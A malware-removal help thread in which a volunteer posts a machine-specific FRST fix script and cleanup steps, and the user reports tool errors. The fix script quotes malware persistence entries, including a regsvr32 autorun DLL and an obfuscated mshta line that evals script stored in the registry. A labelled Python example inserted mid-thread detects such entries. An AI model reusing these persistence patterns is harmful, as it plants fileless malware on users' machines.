File Sharing Infects 500,000 Computers

I very much recommend you uninstall this program from your machine. If not, I can guarantee you will be back needing help with your machine again. The risks of infections from content downloaded with P2P programs far outweigh any benefit of using them.

It is, of course, your choice as to whether or not you remove the program from your machine. It is my duty though, to point out how dangerous it is to use these programs. However, I must request that you do not use it while we are cleaning your machine.


Step 2: Fix with FRST
  • Open notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this, highlight the contents of the box, right-click on it and select Copy.)
  • Right-click in the open notepad and select Paste.
  • Save it on the desktop as fixlist.txt

    NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Etzption] => regsvr32.exe C:\Users\HP\AppData\Local\Etzption\kgnxycpl.dll <===== ATTENTION
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\MountPoints2: F - F:\Setup.exe
SearchScopes: HKLM-x32 -> DefaultScope value is missing
C:\Users\HP\AppData\Local\Etzption
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1442127735&z=8f6c8bea7b47c1abc4c3a41g0z6z1o2g1o8m5wdm1b&from=cor&uid=WDCXWD5000LPVX-60V0TT0_WD-WX61AB404E2U04E2U
FF Plugin HKU\S-1-5-21-1988295413-3700943990-1798627009-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [No File]
HKU\.DEFAULT\Software\Classes\23352ea4: "C:\Windows\system32\mshta.exe" "javascript:fX5Ma="nNrr";JA1=new ActiveXObject("WScript.Shell");CSc4J="v9eFQB";o3BHJ5=JA1.RegRead("HKCU\\software\\uafzn\\pasf");Gb9xLXb="36Ad";eval(o3BHJ5);lnG1a="d";" <===== ATTENTION
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [344]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [344]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\Application Data:NT [40]
AlternateDataStreams: C:\Users\HP\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT2 [344]
FirewallRules: [TCP Query User{EC646AD1-5D56-41D2-926F-C12EA6261B6F}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
FirewallRules: [UDP Query User{17D0503A-5B06-4918-A320-CB58C49EC9F5}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
Emptytemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: AdwCleaner

Download ADWcleaner by clicking here. Please save it to your Desktop.

  • Double click (Vista and 7 users: right click) the adwcleaner.exe file and click Run as Administrator and accept the UAC prompt to run AdwCleaner
  • Once AdwCleaner's control panel is open and it says "Waiting for Action", click on Options at the top of the control panel.
  • Please Check the following options:
    • Reset Proxy Settings
    • Reset Winsock Settings
    • Reset TCP/IP Settings
    • Reset Firewall Settings
    • Reset IPSec Settings
    • Reset BITS Queue
    • Reset Internet Explorer Policies
    • Reset Chrome Policies
  • Close any open windows or browsers.
  • Pause your Anti-Virus program if it is running.
  • Once it starts, click on the Scan button.
  • Let the scan complete itself. This may take a few minutes.
  • Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Cleaning button. When finished, it will ask to reboot. Please reboot.
  • When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
    • Click the Logfile button and the log will open. Copy and Paste the contents of the log file into your next reply.
    This report is also saved at C:\Adwcleaner
Step 5: Fresh FRST Logs
  • Start Farbar's Recovery Scan Tool, place a check in the Addition.txt box and press the Scan button.
  • FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log
Junkware Removal Tool Log
AdwCleaner Log
Fresh FRST.txt Log
Fresh Addition.txt Log

  • 0
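An added example (not part of the thread, and not FRST's own logic): a small triage pass over FRST-style lines that flags the kinds of entries the fixlist in post #10 removes. The rule names, the user-writable path heuristic and the last sample line are assumptions made for illustration; a hit is a lead for review, not a verdict.

```python
import re
from typing import Iterable, List, NamedTuple

# Constructed sample in the FRST layout used in this thread. Paths, SID and
# value names are copied from the logs above; the mshta payload is elided and
# the last entry is a hypothetical benign autorun added for contrast.
SAMPLE_LINES = [
    r"HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Etzption] => regsvr32.exe C:\Users\HP\AppData\Local\Etzption\kgnxycpl.dll <===== ATTENTION",
    r'HKU\.DEFAULT\Software\Classes\23352ea4: "C:\Windows\system32\mshta.exe" "javascript:<payload elided>"',
    r"FirewallRules: [{3FB40881-A55B-4AB9-B43C-282E0EA45BA5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
    r"FirewallRules: [TCP Query User{26C5384F-A329-45CB-9871-71EF2DB92735}C:\users\hp\desktop\texture-studio-master\samp-server.exe] => (Allow) C:\users\hp\desktop\texture-studio-master\samp-server.exe",
    r"FirewallRules: [TCP Query User{26DE1C8B-6AF7-43DA-9176-4C5D81BAC221}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe",
    r"AlternateDataStreams: C:\ProgramData:NT2 [344]",
    r"HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe",
]


class Finding(NamedTuple):
    rule: str
    detail: str


# Assumption: directories a standard user can write to without elevation.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|downloads|desktop)\\", re.I)
RUN_RE = re.compile(
    r"^HK[A-Z]+\\.*?\\Run(?:Once)?: \[(?P<name>[^\]]*)\] => (?P<cmd>.+)$", re.I)
REGSVR_RE = re.compile(
    r'^"?(?:[a-z]:\\[^"]*\\)?regsvr32(?:\.exe)?"?\s+(?P<args>.+)$', re.I)
MSHTA_RE = re.compile(r'mshta(?:\.exe)?"?\s+"?(?:javascript|vbscript):', re.I)
FW_RE = re.compile(
    r"^FirewallRules: \[(?P<rule>.*)\] => \((?P<action>Allow|Block)\) (?P<path>.+)$")
ADS_RE = re.compile(
    r"^AlternateDataStreams: (?P<path>.+?):(?P<stream>[^:\s]+) \[(?P<size>\d+)\]$")


def triage(lines: Iterable[str]) -> List[Finding]:
    """Return review leads for autorun, firewall and ADS lines."""
    findings: List[Finding] = []
    for raw in lines:
        # FRST appends its own "<===== ATTENTION" marker to some lines.
        line = raw.split("<=====")[0].strip()

        # Registry data that starts mshta with an inline script URL.
        if MSHTA_RE.search(line):
            findings.append(Finding("MSHTA_INLINE_SCRIPT", line.split(": ", 1)[0]))
            continue

        # Run/RunOnce value that registers a DLL from a user-writable folder.
        run = RUN_RE.match(line)
        if run:
            reg = REGSVR_RE.match(run["cmd"])
            if reg and ".dll" in reg["args"].lower() and USER_WRITABLE.search(reg["args"]):
                findings.append(Finding("RUN_REGSVR32_USER_DLL", reg["args"]))
            continue

        # Inbound allow rule for a binary living in a user-writable folder.
        fw = FW_RE.match(line)
        if fw:
            if fw["action"] == "Allow" and USER_WRITABLE.search(fw["path"]):
                findings.append(Finding("FW_ALLOW_USER_PATH", fw["path"]))
            continue

        # Named streams on directories are listed for manual review only.
        ads = ADS_RE.match(line)
        if ads:
            findings.append(Finding("ADS_REVIEW", f"{ads['path']}:{ads['stream']}"))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(f"{finding.rule:24} {finding.detail}")
```

The samp-server.exe firewall hit shows why each lead still needs a human decision: the rule fires on the Desktop path alone, much as CKScanner flagged the "crack" file names earlier in the thread.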

#11
Khazard


    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

When I try to scan with AdwCleaner it says "*sqlite3.dll is corrupted or has been replaced"


  • 0

#12
pystryker


    Trusted Helper

  • Malware Removal
  • 3,912 posts

When I try to scan with AdwCleaner it says "*sqlite3.dll is corrupted or has been replaced"


Hello :)

Please uninstall AdwCleaner and download a new copy from the link in the instructions.
  • 0

#13
Khazard


    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Problem still persists, re-installed and everything, but still the same error


  • 0

#14
pystryker


    Trusted Helper

  • Malware Removal
  • 3,912 posts

Problem still persists, re-installed and everything, but still the same error


Hello :)

Please uninstall the current copy and download a new one from this link. If the problem persists after trying it from this link, please skip to the next step. :thumbsup:

https://toolslib.net...d/1-adwcleaner/
  • 0

#15
Khazard


    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

I deleted the initial fixlog.txt by mistake :(

Here's the second fixlog.txt

Spoiler
 
JRT log:
Spoiler
 
Fresh FRST
Spoiler
 
 
Fresh addition.txt
Spoiler

Edited by Khazard, 23 April 2017 - 08:09 AM.

  • 0





